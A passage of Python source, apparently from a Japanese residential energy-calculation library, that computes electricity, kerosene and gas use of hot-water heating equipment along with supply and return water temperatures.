E_G_hs = calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_hybrid_gas.calc_E_E_hs(
r_WS_hs=r_WS_hs,
E_G_hs=E_G_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 1時間当たりの熱源機の消費電力量 (kWh/h)
return hs_whybrid.get_E_E_hs()
elif hs_type == 'コージェネレーションを使用する':
# コージェネレーションの場合は電力を計上しない
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Theta_ex_a_Ave = get_Theta_ex_a_Ave(Theta_ex)
Theta_ex_d_Ave_d = get_Theta_ex_d_Ave_d(Theta_ex)
Theta_ex_H_Ave = get_Theta_ex_H_Ave(Theta_ex, L_T_H_rad)
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
q_rtd_hs = hs_ghpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_ghpump.calc_E_E_hs_d_t(
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_ex_a_Ave=Theta_ex_a_Ave,
Theta_ex_d_Ave_d=Theta_ex_d_Ave_d,
Theta_ex_H_Ave=Theta_ex_H_Ave,
Theta_SW_d_t=Theta_SW_d_t,
q_max_hs=q_rtd_hs,
L_H_x_t_i=L_T_H_rad,
L_CS_x_t_i=L_CS_x_t_i,
L_CL_x_t_i=L_CL_x_t_i,
HeatExchangerType=H_HS['HeatExchanger']
)
else:
raise ValueError(hs_type)
print('{} E_E_hs = {} [kwh]'.format(hs_type, np.sum(E_E_hs)))
return E_E_hs
def get_rad_type_list():
"""放熱系の種類
Args:
Returns:
list: 放熱系の種類
"""
# 放熱系の種類
return [
'温水暖房用パネルラジエーター',
'温水暖房用ファンコンベクター',
'温水暖房用床暖房'
]
def get_rad_list(H_MR, H_OR):
"""主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
Args:
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
Returns:
list: 放熱機器の暖房区画ごとの配列
"""
# 暖房区画i=1-5に対応した放熱器のリストを作成
rad_list = [None, None, None, None, None]
# 放熱系の種類
rad_types = get_rad_type_list()
# 主たる居室
if H_MR is not None:
if H_MR['type'] in rad_types:
rad_list[0] = H_MR
# その他の居室
if H_OR is not None:
if H_OR['type'] in rad_types:
rad_list[1] = H_OR
rad_list[2] = H_OR
rad_list[3] = H_OR
rad_list[4] = H_OR
return rad_list
def calc_L_HWH(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機の熱負荷
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機の熱負荷
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
return Q_dmd_H_hs_d_t
def calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機の灯油消費量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機の灯油消費量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_oil.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_oil.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_oil.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度 (9)
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad)
# 温水暖房用熱源機の灯油消費量
E_K_hs = hs_oil.calc_E_K_hs(
Q_out_H_hs=Q_out_H_hs,
e_rtd=e_rtd,
hs_type=hs_type,
Theta_SW_hs=Theta_SW_d_t,
Theta_RW_hs=Theta_RW_hs,
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
E_K_hs = hs_gas.get_E_K_hs()
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
E_K_hs = hs_eheater.get_E_K_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
E_K_hs = hs_ehpump.get_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_K_hs = hs_gas_hybrid.get_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
E_K_hs = hs_hybrid_gas.calc_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_K_hs = hs_whybrid.get_E_K_hs()
elif hs_type == 'コージェネレーションを使用する':
E_K_hs = np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
E_K_hs = hs_ghpump.get_E_K_hs_d_t()
else:
raise ValueError(hs_type)
print('{} E_K_hs = {} [MJ] (L_T_H_rad = {} [MJ])'.format(hs_type, np.sum(E_K_hs), np.sum(L_T_H_rad)))
return E_K_hs
def calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機のガス消費量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機のガス消費量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
E_G_hs = hs_oil.get_E_G_hs()
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_gas.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 温水暖房用熱源機の定格能力 (W)
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
E_G_hs = hs_gas.calc_E_G_hs(
e_rtd=e_rtd,
q_rtd_hs=q_rtd_hs,
Q_out_H_hs=Q_out_H_hs,
hs_type=hs_type,
P_hs=p_hs,
)
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
E_G_hs = hs_eheater.get_E_G_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
E_G_hs = hs_ehpump.get_E_G_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A,
A_MR, A_OR, region, mode_MR, mode_OR,
L_T_H_rad)
E_G_hs = hs_gas_hybrid.calc_E_G_hs(
Theta_ex=Theta_ex,
Theta_SW_d_t=Theta_SW_d_t,
Theta_RW_hs=Theta_RW_hs,
TU_place=H_HS['TU_place'],
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
E_G_hs = hs_hybrid_gas.calc_E_G_hs(
q_rtd_hs=q_rtd_hs,
Q_out_H_hs=Q_out_H_hs,
P_hs=p_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_G_hs = hs_whybrid.get_E_G_hs()
elif hs_type == 'コージェネレーションを使用する':
E_G_hs = np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
E_G_hs = hs_ghpump.get_E_G_hs_d_t()
else:
raise ValueError(hs_type)
print('{} E_G_hs = {} [MJ] (L_T_H_rad = {} [MJ])'.format(hs_type, np.sum(E_G_hs), np.sum(L_T_H_rad)))
return E_G_hs
def get_E_M_hs_d_t(H_HS):
"""温水暖房用熱源機のその他の燃料による一次エネルギー消費量
Args:
H_HS(dict): 温水暖房機の仕様
Returns:
ndarray: 温水暖房用熱源機のその他の燃料による一次エネルギー消費量
"""
hs_type = H_HS['type']
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
return hs_oil.get_E_M_hs()
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
return hs_gas.get_E_M_hs()
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
return hs_eheater.get_E_M_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
return hs_ehpump.get_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hs_gas_hybrid.get_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
return hs_hybrid_gas.calc_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hs_whybrid.get_E_M_hs()
elif hs_type == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
return hs_ghpump.get_E_M_hs_d_t()
else:
raise ValueError(hs_type)
# ============================================================================
# 7.2 暖房出力
# ============================================================================
def calc_Q_dmd_H_hs_d_t(rad_list, pipe_insulation, underfloor_pipe_insulation, Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad_d_t):
"""温水暖房用熱源機の温水熱需要 (6)
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
L_T_H_rad_d_t: returns: 温水暖房用熱源機の温水熱需要
Returns:
ndarray: 温水暖房用熱源機の温水熱需要
"""
MR_rad_type, r_Af_1 = get_MR_rad_type_and_r_Af_1(rad_list)
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Q_dmd_H_hs_d_t = np.zeros_like(Theta_SW_d_t)
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad_d_t[i - 1])
# 1時間当たりの暖冷房区画iに設置された放熱器の温水供給運転率
r_WS_rad_d_t_i = calc_r_WS_rad_d_t_i(
A_HCZ=A_HCZ,
radiator=rad_list[i - 1],
Q_T_H_rad=Q_T_H_rad_d_t_i,
Theta_SW=Theta_SW_d_t,
region=region,
mode=mode,
R_type=R_type
)
Q_dmd_H_ln_d_t_i = calc_Q_dmd_H_ln_d_t_i(
i=i,
radiator=rad_list[i - 1],
Q_T_H_rad_d_t_i=Q_T_H_rad_d_t_i,
Q_max_H_rad_d_t_i=Q_max_H_rad_d_t_i,
L_T_H_rad_d_t_i=L_T_H_rad_d_t[i - 1],
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
Q_dmd_H_hs_d_t = Q_dmd_H_hs_d_t + Q_dmd_H_ln_d_t_i
return Q_dmd_H_hs_d_t
def get_MR_rad_type_and_r_Af_1(rad_list):
"""主たる居室の放熱機器と当該住戸における温水床暖房の敷設率 (-)
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
Returns:
tuple: 主たる居室の放熱機器と当該住戸における温水床暖房の敷設率 (-)
"""
if rad_list[0] is not None:
MR_rad_type = rad_list[0]['type']
if 'r_Af' in rad_list[0]:
r_Af_1 = rad_list[0]['r_Af']
else:
r_Af_1 = None
else:
MR_rad_type = None
r_Af_1 = None
return MR_rad_type, r_Af_1
# ============================================================================
# 7.3 温水供給運転率
# ============================================================================
def calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW, region, A_A, A_MR, A_OR, mode_MR):
"""温水暖房用熱源機の温水供給運転率
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 運転モード 'い', 'ろ', 'は'
Returns:
ndarray: 温水暖房用熱源機の温水供給運転率
"""
# (7a)
n = sum([rad is not None for rad in rad_list]) # 放熱系統数
if n == 1:
A_HCZ = calc_A_HCZ_i(1, A_A, A_MR, A_OR)
radiator = rad_list[0]
R_type = '主たる居室'
tmp = calc_r_WS_ln_d_t_i(A_HCZ, radiator, Q_T_H_rad[0], Theta_SW, region, mode_MR, R_type)
elif n > 1:
tmp = np.ones(24 * 365)
else:
raise ValueError(n)
# (7b)
tmp[Q_dmd_H_hs_d_t == 0] = 0
return tmp
# ============================================================================
# 7.4 往き温水温度
# ============================================================================
def get_Theta_SW_hs_op(hs_type, CG=None):
"""温水暖房用熱源機の往き温水温度の候補
Args:
hs_type(str): 温水暖房用熱源機の種類
CG(dict, optional): コージェネレーションの機器 (Default value = None)
Returns:
tuple: 温水暖房用熱源機の往き温水温度の候補
"""
if hs_type == '石油従来型温水暖房機' or hs_type == '石油従来型給湯温水暖房機':
return get_table_4()[0]
elif hs_type == '石油潜熱回収型温水暖房機' or hs_type == '石油潜熱回収型給湯温水暖房機':
return get_table_4()[1]
elif hs_type == 'ガス従来型温水暖房機' or hs_type == 'ガス従来型給湯温水暖房機' or hs_type == 'ガス従来型' or hs_type == 'G_NEJ':
return get_table_4()[2]
elif hs_type == 'ガス潜熱回収型温水暖房機' or hs_type == 'ガス潜熱回収型給湯温水暖房機' or hs_type == 'ガス潜熱回収型' or hs_type == 'G_EJ':
return get_table_4()[3]
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
return get_table_4()[4]
elif hs_type == '電気ヒートポンプ温水暖房機':
return get_table_4()[5]
elif hs_type == '地中熱ヒートポンプ温水暖房機':
return get_table_4()[6]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return get_table_4()[7]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or\
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
return get_table_4()[8]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return get_table_4()[9]
elif hs_type == 'コージェネレーションを使用する':
from pyhees.section8_a import get_type_BB_HWH
if 'CG_category' in CG:
type_BB_HWH = get_type_BB_HWH(CG['CG_category'])
else:
type_BB_HWH = CG['type_BB_HWH']
return get_Theta_SW_hs_op(type_BB_HWH)
elif hs_type == '給湯・温水暖房一体型を使用する':
raise NotImplementedError()
else:
raise ValueError(hs_type)
def calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR):
"""温水暖房用熱源機の往き温水温度の区分 (8)
Args:
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
L_T_H_rad(ndarray): 放熱器の暖房負荷
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
Returns:
ndarray: 温水暖房用熱源機の往き温水温度の区分 (8)
"""
p_ln = np.zeros((5, 24 * 365), dtype=np.int32)
# 初期値として、最低温度を指定
p_ln[:] = len(Theta_SW_hs_op)
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is not None:
A_HCZ_i = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
mode = mode_MR if i == 1 else mode_OR
R_type = '主たる居室' if i == 1 else 'その他の居室'
p_ln_i = calc_p_ln_d_t_i(rad_list[i - 1], L_T_H_rad[i - 1], Theta_SW_hs_op, A_HCZ_i, region, mode, R_type)
p_ln[i - 1, :] = p_ln_i
return np.min(p_ln, axis=0)
def get_Theta_SW_d_t(Theta_SW_hs_op, p_hs_d_t):
"""要求往き温水温度
Args:
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
p_hs_d_t(ndarray): 温水暖房用熱源機の往き温水温度
Returns:
ndarray: 要求往き温水温度
"""
# 一括変換用のndarrayを作成
n = len(Theta_SW_hs_op)
array_Theta_SW_hs_op = np.array(Theta_SW_hs_op).reshape((n, 1))
# p_d_tに基づいて1時間当たりの往き温水温度を取得
Theta_SW_d_t = array_Theta_SW_hs_op[p_hs_d_t - 1]
return Theta_SW_d_t.reshape(p_hs_d_t.shape)
def get_table_4():
"""表4 温水暖房用熱源機における往き温水温度の区分及び候補
Args:
Returns:
list: 表4 温水暖房用熱源機における往き温水温度の区分及び候補
"""
table_4 = [
(60,),
(60, 40),
(60,),
(60, 40),
(60,),
(55, 45, 35),
(55, 45, 35),
(60, 40),
(60, 40),
(60, 40),
]
return table_4
# ============================================================================
# 7.5 戻り温水温度
# ============================================================================
def calc_Theta_RW_hs_d_t(Theta_SW_hs_d_t, rad_list, pipe_insulation, underfloor_pipe_insulation, A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad):
"""戻り温水温度 (9)
Args:
Theta_SW_hs_d_t(ndarray): 温水暖房用熱源機の往き温水温度
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
Returns:
ndarray: 戻り温水温度 (9)
"""
MR_rad_type, r_Af_1 = get_MR_rad_type_and_r_Af_1(rad_list)
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Q_dmd_H_ln_d_t = np.zeros((5, 24 * 365))
Q_dash_max_H_rad_d_t = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
